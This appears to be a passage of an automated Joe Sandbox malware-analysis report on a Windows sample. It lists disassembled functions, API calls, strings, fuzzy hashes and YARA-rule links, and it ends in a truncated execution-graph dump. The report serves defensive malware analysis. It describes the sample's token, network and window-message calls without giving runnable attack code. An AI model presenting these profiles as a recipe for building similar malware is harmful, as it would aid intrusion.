                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: 884ec7d6fc1915daeb807bdd50472687010f5bca0e30fe3fd245f9701c0d31ea
                                                                      • Instruction ID: b910d585a54ad66bff0562cfe12fc27df8d2895e35d9669a5ec75e3368952757
                                                                      • Opcode Fuzzy Hash: 884ec7d6fc1915daeb807bdd50472687010f5bca0e30fe3fd245f9701c0d31ea
                                                                      • Instruction Fuzzy Hash: 72F05E36041259FBDB126F94AC4AFDE3F69AF06710F048100FA11650E1C7B65611DFE5
                                                                      Function 00C8162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00C81634
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C811D9), ref: 00C8163B
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C811D9), ref: 00C81648
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C811D9), ref: 00C8164F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: ce32d391f6325174f0a1299ad74313c28ef5dc95c7e97e98ce17dacf0d286144
                                                                      • Instruction ID: 71ae102eb1a226f425e4affd64f7c4c6eb233308ef4ad0499a9e31bd98a4e38d
                                                                      • Opcode Fuzzy Hash: ce32d391f6325174f0a1299ad74313c28ef5dc95c7e97e98ce17dacf0d286144
                                                                      • Instruction Fuzzy Hash: D7E08631601211DBD7202FA0AD4DB8B3BBCEF44795F184918F695C9090E6344541C764
                                                                      Function 00C94D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C27620: _wcslen.LIBCMT ref: 00C27625
                                                                      • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00C94ED4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Connection_wcslen
                                                                      • String ID: *$LPT
                                                                      • API String ID: 1725874428-3443410124
                                                                      • Opcode ID: 62603628adfa1dea83211b8c9bfcc543682c4aa3c67bdeaba94d61dc84978ed6
                                                                      • Instruction ID: 00014f47dbe0a50d65437e3cb1b390a5d5d37cc8de3c0f641da928015057ffbe
                                                                      • Opcode Fuzzy Hash: 62603628adfa1dea83211b8c9bfcc543682c4aa3c67bdeaba94d61dc84978ed6
                                                                      • Instruction Fuzzy Hash: 36916275A002159FCB18DF98C4C8EAABBF5BF44304F148099E41A9F762D735EE86CB91
                                                                      Function 00C3E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #
                                                                      • API String ID: 0-1885708031
                                                                      • Opcode ID: e1a5b8ec31f5ff3c2b260c0667bf1900e83d3ddc748ced8d149c54aced0605f2
                                                                      • Instruction ID: f021e469c420ab02482364e8826107c7a1b45d77d0d237517df7fcdf40e3c196
                                                                      • Opcode Fuzzy Hash: e1a5b8ec31f5ff3c2b260c0667bf1900e83d3ddc748ced8d149c54aced0605f2
                                                                      • Instruction Fuzzy Hash: 2B512376500346DFDB19DF68C481ABA7BA8EF19310F248095FCA59B2D0D7349E52DBA0
                                                                      Function 00C3F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00C3F2A2
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00C3F2BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 13c655d19ca53e4e0f79c1423a75ec3c27161209c99d234a530f31b066cff04b
                                                                      • Instruction ID: 0b7190e95f1b18c1b0312fbfcbcdc392ea08fce9ed6c5a3b61feb012188a6ea6
                                                                      • Opcode Fuzzy Hash: 13c655d19ca53e4e0f79c1423a75ec3c27161209c99d234a530f31b066cff04b
                                                                      • Instruction Fuzzy Hash: 1D512372408744ABD320AF54E886BAFBBF8FB84300F81895DF1D9411A5EB719529CB66
                                                                      Function 00CA5745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 00CA57E0
                                                                      • _wcslen.LIBCMT ref: 00CA57EC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpper_wcslen
                                                                      • String ID: CALLARGARRAY
                                                                      • API String ID: 157775604-1150593374
                                                                      • Opcode ID: 24982de71cc7990a57a60862e33888aaf4a4d5908f407c6c2d2b8445bbbaa071
                                                                      • Instruction ID: 162561f9cee836ceb322a6fa252ebc117468cf362b878f275c20024719621fa4
                                                                      • Opcode Fuzzy Hash: 24982de71cc7990a57a60862e33888aaf4a4d5908f407c6c2d2b8445bbbaa071
                                                                      • Instruction Fuzzy Hash: B041B271E0020A9FCB14DFA9C8819BEBBB5FF5A318F148129E515A7291E7349E81DB90
                                                                      Function 00C9D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00C9D130
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00C9D13A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_wcslen
                                                                      • String ID: |
                                                                      • API String ID: 596671847-2343686810
                                                                      • Opcode ID: 9b545daa06d70d3c142eb4f9e8b44babd9281b0c3d2909d9ce1ba9790df53eda
                                                                      • Instruction ID: f7dc08d6ff230b6f1630f6f09851438176061917788d389396bd87d99a8c7a48
                                                                      • Opcode Fuzzy Hash: 9b545daa06d70d3c142eb4f9e8b44babd9281b0c3d2909d9ce1ba9790df53eda
                                                                      • Instruction Fuzzy Hash: CE313C71D01219ABCF15EFA5DC85AEEBFB9FF04310F100019F816B6162EB31AA56DB60
                                                                      Function 00C9CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00C9CD7D
                                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00C9CDA6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Internet$OpenOption
                                                                      • String ID: <local>
                                                                      • API String ID: 942729171-4266983199
                                                                      • Opcode ID: 9073e51ad43e5ec2ff13b18c1aa1cee6a0d7a8701c88845d8b83987b153abe7b
                                                                      • Instruction ID: 01d50f0c0fec5baa94fc2111d01bdd28edf872bfc3ca528a7e4fa5e187516f5b
                                                                      • Opcode Fuzzy Hash: 9073e51ad43e5ec2ff13b18c1aa1cee6a0d7a8701c88845d8b83987b153abe7b
                                                                      • Instruction Fuzzy Hash: 3311A3B22056317ADB244B668CC9FE7BE6CEB127A4F004226F11993080D6609950D6F0
                                                                      Function 00C86C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00C86CB6
                                                                      • _wcslen.LIBCMT ref: 00C86CC2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharUpper
                                                                      • String ID: STOP
                                                                      • API String ID: 1256254125-2411985666
                                                                      • Opcode ID: a7059eab0a96389844fd0602272c0a89901da725c7fe9afba927f4c12172bc23
                                                                      • Instruction ID: 7bbd57035349d102d62d64ec4d7b37cef6bd63eee92224e240b24c4dcc935eed
                                                                      • Opcode Fuzzy Hash: a7059eab0a96389844fd0602272c0a89901da725c7fe9afba927f4c12172bc23
                                                                      • Instruction Fuzzy Hash: 3101C032A105268BCB21BFFEDC809BF77B5FB61718B100529E86296190EA31DA00D754
                                                                      Function 00C81CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00C81D4C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 47df3eead7af1c3f257fe63216dd0cbcb7c99be2ffc108f80dc79978c5f86f0a
                                                                      • Instruction ID: 6dfe83445a83c584c0be63e3ab8f186335a496ca4c9963d19210426bb027ccfd
                                                                      • Opcode Fuzzy Hash: 47df3eead7af1c3f257fe63216dd0cbcb7c99be2ffc108f80dc79978c5f86f0a
                                                                      • Instruction Fuzzy Hash: C201D875601228ABCB05FBA4DC51EFE73A8FB46354F08062AFC32572C1EA3059099764
                                                                      Function 00C81BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00C81C46
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: e85c4471fde5c66b8eb9df9aa0ce103ee8cc0c14f9bcbf324b988ebe9b855769
                                                                      • Instruction ID: 87bc8c4073c9e14535991a93a2b7bc5ee7b4b11fac8707e24cefe84e23335bee
                                                                      • Opcode Fuzzy Hash: e85c4471fde5c66b8eb9df9aa0ce103ee8cc0c14f9bcbf324b988ebe9b855769
                                                                      • Instruction Fuzzy Hash: 9901A775B8111867CB04FB90D951EFF77ECEB16344F180029B816672C1EA209F0997B5
                                                                      Function 00C81C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00C81CC8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 8202fca70cae867ffc0c847fe5e295b877c2b7bd6ed99e9dc29100022734a2e8
                                                                      • Instruction ID: aab7fdd9d05f85698c8440c27cd2b5aaa0a1596e44693cb8386e77ddf37ba8ee
                                                                      • Opcode Fuzzy Hash: 8202fca70cae867ffc0c847fe5e295b877c2b7bd6ed99e9dc29100022734a2e8
                                                                      • Instruction Fuzzy Hash: 9201D6B5B8012867CB04FBA5DA11EFE73ECAB12384F180025BC0273281EA709F09D775
                                                                      Function 00C81D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                        • Part of subcall function 00C83CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00C83CCA
                                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00C81DD3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ClassMessageNameSend_wcslen
                                                                      • String ID: ComboBox$ListBox
                                                                      • API String ID: 624084870-1403004172
                                                                      • Opcode ID: 5d28f1bd2867646633695e41f76eff5cf5a6fe7d98dde0c1289ba527faf87061
                                                                      • Instruction ID: 05ec9f82461bd89be9f6652d633783835a52367c670794ba3eabfbd21dd62c34
                                                                      • Opcode Fuzzy Hash: 5d28f1bd2867646633695e41f76eff5cf5a6fe7d98dde0c1289ba527faf87061
                                                                      • Instruction Fuzzy Hash: EBF0C871B5122867DB05F7A5DC52FFF77BCEB02758F080926BC22632C1DA705A099364
                                                                      Function 00C93017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C9302F
                                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00C93044
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: 4cfc0f439c58a064e0e07eaac1eaf5b6df1db888825b952df3a087433b1bd047
                                                                      • Instruction ID: 8eed56b951182e1f6d5aed5838a7606e4e4cc4adf4d81b0a7d83f87c291df078
                                                                      • Opcode Fuzzy Hash: 4cfc0f439c58a064e0e07eaac1eaf5b6df1db888825b952df3a087433b1bd047
                                                                      • Instruction Fuzzy Hash: C9D05EB290032867DA20A7A5AC4EFCB3A6CDB04750F0002A1B755E3091DAB89984CBE1
                                                                      Function 00C5BDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C5BE93
                                                                      • GetLastError.KERNEL32 ref: 00C5BEA1
                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C5BEFC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 1717984340-0
                                                                      • Opcode ID: 1bf374ca8a6fbda83f6c16bd702db06c2e2229f425b6eb339e13b41e635264d5
                                                                      • Instruction ID: de9daac9c2736b90df334ebd0d4837c898ec9576fc6691e498b4cf73ca5d510c
                                                                      • Opcode Fuzzy Hash: 1bf374ca8a6fbda83f6c16bd702db06c2e2229f425b6eb339e13b41e635264d5
                                                                      • Instruction Fuzzy Hash: 6941C63C600206AFCB21CFA5CC45BAA7FA5AF41312F144269FD69571A1DB708E89DB64

                                                                      Execution Graph

                                                                      Execution Coverage:1.2%
                                                                      Dynamic/Decrypted Code Coverage:4.9%
                                                                      Signature Coverage:7.7%
                                                                      Total number of Nodes:143
                                                                      Total number of Limit Nodes:12
                                                                      execution_graph 95339 430253 95342 42f153 95339->95342 95345 42d443 95342->95345 95344 42f16c 95346 42d460 95345->95346 95347 42d471 RtlFreeHeap 95346->95347 95347->95344 95272 4253a3 95273 4253bf 95272->95273 95274 4253e7 95273->95274 95275 4253fb 95273->95275 95276 42d0d3 NtClose 95274->95276 95282 42d0d3 95275->95282 95278 4253f0 95276->95278 95279 425404 95285 42f273 RtlAllocateHeap 95279->95285 95281 42540f 95283 42d0f0 95282->95283 95284 42d101 NtClose 95283->95284 95284->95279 95285->95281 95348 42f233 95351 42d3f3 95348->95351 95350 42f24e 95352 42d410 95351->95352 95353 42d421 RtlAllocateHeap 95352->95353 95353->95350 95354 425733 95355 42574c 95354->95355 95356 425797 95355->95356 95359 4257d7 95355->95359 95361 4257dc 95355->95361 95357 42f153 RtlFreeHeap 95356->95357 95358 4257a7 95357->95358 95360 42f153 RtlFreeHeap 95359->95360 95360->95361 95362 42c6d3 95363 42c6ed 95362->95363 95366 3272df0 LdrInitializeThunk 95363->95366 95364 42c715 95366->95364 95286 41bc63 95287 41bca7 95286->95287 95288 41bcc8 95287->95288 95289 42d0d3 NtClose 95287->95289 95289->95288 95290 41af03 95291 41af75 95290->95291 95292 41af1b 95290->95292 95292->95291 95294 41ee73 95292->95294 95295 41ee99 95294->95295 95302 41ef99 95295->95302 95303 430293 RtlAllocateHeap RtlFreeHeap 95295->95303 95297 41ef2e 95298 41ef90 95297->95298 95297->95302 95309 42c723 95297->95309 95298->95302 95304 429353 95298->95304 95301 41f051 95301->95291 95302->95291 95303->95297 95305 4293b8 95304->95305 95306 4293f3 95305->95306 95313 419503 95305->95313 95306->95301 95308 4293d5 95308->95301 95310 42c73d 95309->95310 95320 3272c0a 95310->95320 95311 42c769 95311->95298 95314 4194c4 95313->95314 95317 42d493 95314->95317 95316 4194eb 95316->95308 95318 42d4ad 95317->95318 95319 42d4be ExitProcess 95318->95319 95319->95316 95321 3272c1f LdrInitializeThunk 95320->95321 95322 3272c11 95320->95322 95321->95311 95322->95311 95323 414683 95324 4146a9 95323->95324 95326 4146d3 95324->95326 95327 414403 95324->95327 95328 414425 95327->95328 95330 42d353 95327->95330 95328->95326 95331 42d36d 95330->95331 95334 3272c70 LdrInitializeThunk 95331->95334 95332 42d395 95332->95328 95334->95332 95367 414973 95368 41498c 95367->95368 95373 418153 95368->95373 95370 4149aa 95371 4149f6 95370->95371 95372 4149e3 PostThreadMessageW 95370->95372 95372->95371 95374 418177 95373->95374 95375 41817e 95374->95375 95376 4181c5 LdrLoadDll 95374->95376 95375->95370 95376->95375 95335 3272b60 LdrInitializeThunk 95336 419708 95337 42d0d3 NtClose 95336->95337 95338 419712 95337->95338 95377 4017dc 95378 4017f5 95377->95378 95381 4306c3 95378->95381 95384 42ed03 95381->95384 95385 